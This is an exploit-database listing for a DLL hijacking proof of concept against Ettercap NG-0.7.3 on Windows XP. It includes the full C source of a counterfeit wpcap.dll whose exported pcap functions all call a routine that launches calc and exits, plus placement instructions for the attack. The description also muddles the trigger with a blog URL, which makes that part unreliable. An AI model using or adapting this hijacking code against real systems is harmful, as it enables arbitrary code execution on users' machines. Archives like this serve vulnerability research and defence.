header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
7,8
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: N/A
Affected Version From: Ettercap NG-0.7.3
Affected Version To: Ettercap NG-0.7.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Ettercap NG-0.7.3 DLL hijacking (wpcap.dll)

Ettercap NG-0.7.3 is vulnerable to DLL hijacking. An attacker can create a malicious DLL file named wpcap.dll and place it in the same directory as a file with the .pcap extension. When the user visits http://chaossecurity.wordpress.com/, the malicious DLL will be executed.

Mitigation:

Ensure that all DLLs used by the application are legitimate and up-to-date. Also, ensure that the application is running with the least privileges necessary.
Source

Exploit-DB raw data:

/*
Exploit Title:  Ettercap NG-0.7.3 DLL hijacking (wpcap.dll)
Date: 25/08/2010
Author: Anonymous
Tested on: Windows XP SP3
Vulnerable extensions: .pcap
Compile and rename to wpcap.dll, create a file in the same dir .pcap extension
and visit http://chaossecurity.wordpress.com/
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)


DLLIMPORT void pcap_findalldevs() { evil(); }
DLLIMPORT void pcap_close() { evil(); }
DLLIMPORT void pcap_compile() { evil(); }
DLLIMPORT void pcap_datalink() { evil(); }
DLLIMPORT void pcap_datalink_val_to_description() { evil(); }
DLLIMPORT void pcap_dump() { evil(); }
DLLIMPORT void pcap_dump_close() { evil(); }
DLLIMPORT void pcap_dump_open() { evil(); }
DLLIMPORT void pcap_file() { evil(); }
DLLIMPORT void pcap_freecode() { evil(); }
DLLIMPORT void pcap_geterr() { evil(); }
DLLIMPORT void pcap_getevent() { evil(); }
DLLIMPORT void pcap_lib_version() { evil(); }
DLLIMPORT void pcap_lookupdev() { evil(); }
DLLIMPORT void pcap_lookupnet() { evil(); }
DLLIMPORT void pcap_loop() { evil(); }
DLLIMPORT void pcap_open_live() { evil(); }
DLLIMPORT void pcap_open_offline() { evil(); }
DLLIMPORT void pcap_setfilter() { evil(); }
DLLIMPORT void pcap_snapshot() { evil(); }
DLLIMPORT void pcap_stats() { evil(); }
int evil()

{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

Navigation

Suggest Exploit

Services By CQR